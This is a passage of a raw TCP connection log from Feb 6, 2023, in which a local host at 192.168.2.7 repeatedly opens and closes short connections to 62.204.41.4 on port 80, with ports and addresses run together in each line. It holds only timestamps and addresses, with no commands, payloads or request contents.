                                                                      Feb 6, 2023 18:37:21.558105946 CET5002880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.668160915 CET5002880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.669061899 CET5002980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.730128050 CET805002862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:21.730242968 CET5002880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.731266022 CET805002962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:21.731374979 CET5002980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.731774092 CET5002980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.794104099 CET805002962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:21.796478033 CET805002962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:21.796596050 CET5002980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.902614117 CET5002980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.903536081 CET5003080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.965178013 CET805002962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:21.965307951 CET5002980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.969207048 CET805003062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:21.969376087 CET5003080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:21.969698906 CET5003080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.033236027 CET805003062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.035923004 CET805003062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.036034107 CET5003080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.152671099 CET5003080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.153403997 CET5003180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.218338013 CET805003062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.218493938 CET5003080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.218527079 CET805003162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.218633890 CET5003180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.219104052 CET5003180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.283418894 CET805003162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.288219929 CET805003162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.288449049 CET5003180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.402004004 CET5003180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.402710915 CET5003280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.464227915 CET805003262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.464437962 CET5003280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.464489937 CET805003162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.464593887 CET5003180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.465404987 CET5003280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.526942015 CET805003262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.530270100 CET805003262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.533339977 CET5003280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.636619091 CET5003280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.637691021 CET5003380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.698395014 CET805003262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.699167013 CET805003362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.699392080 CET5003280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.699527025 CET5003380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.700596094 CET5003380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.762166023 CET805003362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.764436960 CET805003362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.766782999 CET5003380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.872256041 CET5003380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.873361111 CET5003480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.934079885 CET805003362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.934262991 CET5003380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.935089111 CET805003462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:22.937237024 CET5003480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:22.947073936 CET5003480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.009061098 CET805003462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.012310982 CET805003462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.012568951 CET5003480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.121289015 CET5003480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.122946978 CET5003580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.184072018 CET805003462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.184273005 CET5003480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.184525967 CET805003562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.184658051 CET5003580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.185231924 CET5003580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.245872021 CET805003562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.251290083 CET805003562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.251496077 CET5003580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.358578920 CET5003580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.359584093 CET5003680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.419502974 CET805003562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.421267986 CET805003662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.421426058 CET5003580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.421480894 CET5003680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.421958923 CET5003680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.483444929 CET805003662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.486078978 CET805003662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.486183882 CET5003680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.590176105 CET5003680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.590826988 CET5003780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.651520014 CET805003762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.651791096 CET5003780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.652170897 CET5003780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.652456999 CET805003662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.652597904 CET5003680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.712605953 CET805003762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.715187073 CET805003762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.715363979 CET5003780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.824224949 CET5003780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.825239897 CET5003880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.884975910 CET805003762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.885184050 CET5003780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.885891914 CET805003862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.886039019 CET5003880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.886375904 CET5003880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:23.946886063 CET805003862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.949320078 CET805003862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:23.949523926 CET5003880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.061362982 CET5003880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.062278032 CET5003980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.122409105 CET805003862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.122458935 CET805003962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.122600079 CET5003880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.122667074 CET5003980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.123203039 CET5003980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.183537006 CET805003962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.188124895 CET805003962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.188261032 CET5003980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.293461084 CET5003980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.294411898 CET5004080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.353964090 CET805003962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.354111910 CET5003980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.354784966 CET805004062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.354922056 CET5004080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.355269909 CET5004080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.415652990 CET805004062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.418427944 CET805004062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.418617964 CET5004080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.547410011 CET5004080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.548226118 CET5004180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.608347893 CET805004062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.608470917 CET5004080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.609685898 CET805004162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.609838009 CET5004180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.611334085 CET5004180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.672935009 CET805004162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.675154924 CET805004162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.675292969 CET5004180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.792315960 CET5004180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.792922020 CET5004280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.853319883 CET805004262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.853439093 CET5004280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.854018927 CET805004162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.854109049 CET5004180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.857892990 CET5004280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:24.918385029 CET805004262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.921021938 CET805004262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:24.921123028 CET5004280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.042913914 CET5004280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.044362068 CET5004380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.103477001 CET805004262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.103588104 CET5004280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.104969025 CET805004362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.105088949 CET5004380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.122543097 CET5004380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.183175087 CET805004362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.187724113 CET805004362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.187860012 CET5004380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.314205885 CET5004380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.317459106 CET5004480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.376391888 CET805004362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.376498938 CET5004380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.379429102 CET805004462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.379601955 CET5004480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.381632090 CET5004480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.442006111 CET805004462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.444655895 CET805004462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.444948912 CET5004480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.558013916 CET5004480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.558727980 CET5004580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.618685961 CET805004462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.618865013 CET5004480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.619157076 CET805004562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.619343042 CET5004580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.620163918 CET5004580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.680754900 CET805004562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.683967113 CET805004562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.684113026 CET5004580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.797051907 CET5004580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.799030066 CET5004680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.857587099 CET805004562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.858376026 CET5004580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.861392021 CET805004662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.861893892 CET5004680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.862441063 CET5004680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:25.924679995 CET805004662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.927823067 CET805004662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:25.927989960 CET5004680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.043030024 CET5004680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.043870926 CET5004780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.104096889 CET805004762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:26.104517937 CET5004780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.104922056 CET5004780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.105329037 CET805004662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:26.107923031 CET5004680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.165121078 CET805004762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:26.168797016 CET805004762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:26.172475100 CET5004780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.277247906 CET5004780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.278264046 CET5004880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.337415934 CET805004762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:26.337800026 CET5004780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.339823961 CET805004862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:26.340018988 CET5004880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.342561007 CET5004880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.404712915 CET805004862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:26.407500029 CET805004862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:26.407742977 CET5004880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.517997980 CET5004880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.518759966 CET5004980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:26.578819036 CET805004962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.479893923 CET805007662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.480053902 CET5007680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.482418060 CET805007762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.482569933 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.482978106 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.545505047 CET805007762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.547892094 CET805007762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.548054934 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.653062105 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.654195070 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.716048956 CET805007762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.716094971 CET805007862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.716154099 CET5007780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.716418028 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.718344927 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.782244921 CET805007862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.786504030 CET805007862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.786760092 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.902757883 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.902864933 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.963414907 CET805007962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.963659048 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.964653969 CET805007862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:34.965140104 CET5007880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:34.965163946 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.025444031 CET805007962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.029045105 CET805007962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.029226065 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.136936903 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.139740944 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.197443008 CET805007962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.197545052 CET5007980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.199531078 CET805008062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.199666977 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.199980974 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.260658026 CET805008062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.266577959 CET805008062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.266668081 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.381650925 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.382325888 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.442049980 CET805008062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.442192078 CET5008080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.444793940 CET805008162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.444911957 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.445260048 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.506886959 CET805008162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.510221958 CET805008162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.510334969 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.627574921 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.629290104 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.689654112 CET805008162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.689779043 CET5008180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.691828966 CET805008262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.691946030 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.692289114 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.757100105 CET805008262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.761848927 CET805008262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.761987925 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.877840042 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.883477926 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.940691948 CET805008262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.940783024 CET5008280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.944376945 CET805008362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:35.944468021 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:35.944830894 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.005314112 CET805008362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.011137009 CET805008362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.011254072 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.121320963 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.122000933 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.182857990 CET805008362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.182899952 CET805008462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.183013916 CET5008380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.183109045 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.184166908 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.245105982 CET805008462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.250062943 CET805008462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.250200987 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.361450911 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.363001108 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.422687054 CET805008462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.422866106 CET5008480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.423676014 CET805008562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.423837900 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.424990892 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.487132072 CET805008562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.505920887 CET805008562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.518474102 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.626951933 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.627763033 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.700342894 CET805008562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.700376034 CET805008662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.700869083 CET5008580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.701277018 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.704777002 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.765599012 CET805008662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.768732071 CET805008662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.768939018 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.872703075 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.874378920 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.934978008 CET805008662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.935182095 CET5008680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.936898947 CET805008762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:36.937115908 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.937901020 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:36.998565912 CET805008762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.001657009 CET805008762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.003259897 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.105986118 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.107618093 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.166873932 CET805008762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.167185068 CET5008780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.169327974 CET805008862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.170741081 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.171595097 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.233428955 CET805008862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.239892006 CET805008862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.240106106 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.358699083 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.360677958 CET5008980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.420510054 CET805008862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.422446966 CET805008962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.422687054 CET5008980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.422771931 CET5008880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.423383951 CET5008980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.484903097 CET805008962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.487719059 CET805008962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.487880945 CET5008980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.590787888 CET5008980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.591869116 CET5009080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.652407885 CET805009062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.652436972 CET805008962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:37:37.652595043 CET5009080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.652595043 CET5008980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.652978897 CET5009080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:37:37.714266062 CET805009062.204.41.4192.168.2.7
